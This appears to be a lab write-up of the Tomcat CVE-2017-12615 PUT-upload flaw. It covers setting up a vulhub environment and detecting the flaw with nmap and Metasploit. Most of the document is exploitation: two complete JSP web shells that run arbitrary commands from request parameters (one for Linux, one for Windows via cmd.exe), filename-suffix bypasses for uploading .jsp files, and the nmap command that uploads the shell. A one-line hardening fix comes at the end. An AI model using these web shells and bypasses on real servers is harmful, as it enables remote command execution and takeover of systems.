table of Contents
Vulnerability description
A vulnerability was discovered in Tomcat. In this vulnerability, if the servlet context is configured as readonly = false and HTTP PUT requests are allowed, the attacker can upload JSP files to the context and implement code execution.
Impact version
tomcat 7.0.0 to 7.0.79
Vulnerability environment construction
Use vulhub to directly docker start the environment with one key CVE-2017-12615 environment
Docker quick start and vulnerability environment construction
After downloading and installing vulhub, enter the /tomcat/CVE-2017-12615
directory and execute the following command
docker-compose up -d
Then check the current virtual machine ip and visit port 8080, the tomcat page will appear
Vulnerability detection
Note: If we use the put protocol to create a target file that already exists, this file will be overwritten. In actual combat, you must not put it to the index or the existing file for testing.
nmap
command:
#nmap -p <端口> <ip> --script http-put --script-args http-put.url="<上载到服务器的本地文件的完整路径>",http-put.file='<将文件存储到的远程目录和文件名>'
nmap -p 8080 192.168.234.138 --script http-put --script-args http-put.url="/test1.txt",http-put.file='E:\1.txt'
I created a new 1.txt under my E disk, the content is:test put
The prompt successfully created
indicates that the upload is successful, we manually access
msf
msfconsole
search http_put
use auxiliary/scanner/http/http_put
set filedata 'test put111'
set filename test1.txt
set rhosts 192.168.234.138
set rport 8080
show options
After setting, run, a plus sign will be prompted to indicate that the upload is successful
Batch check put
- namp ip scanning rules or use -iL parameters for batch detection
The batch detection of msf is not very stable. I can’t do batch detection, but a single ip can do. It is not recommended to use msf.
Exploit
Linux one-sentence Trojan:
# cmd2.jsp
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
Windows one sentence Trojan:
#windowscmd.jsp
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>
The default tomcat also does not allow PUT to upload jsp and jspx files, because the backend is used org.apache.jasper.servlet.JspServlet
to process jsp or jspx suffix requests, and there is no logic for PUT upload in JspServlet, and the code implementation of PUT only exists in DefaultServlet.
The root cause of this vulnerability is to bypass the tomcat detection by constructing a special suffix, and let it use the logic of DefaultServlet to process the request, thereby uploading the jsp file.
There are currently three main methods:
- evil.jsp%20
- evil.jsp::$DATA
- evil.jsp/
We also need to modify the file name to bypass when uploading put
nmap -p 8080 192.168.234.138 --script http-put --script-args http-put.url="/cmd.jsp/",http-put.file='E:\1.txt'
Access Trojan files:
Vulnerability hardening
Modify conf / web.xml file in the tomcat directory, find readonly
the false
settrue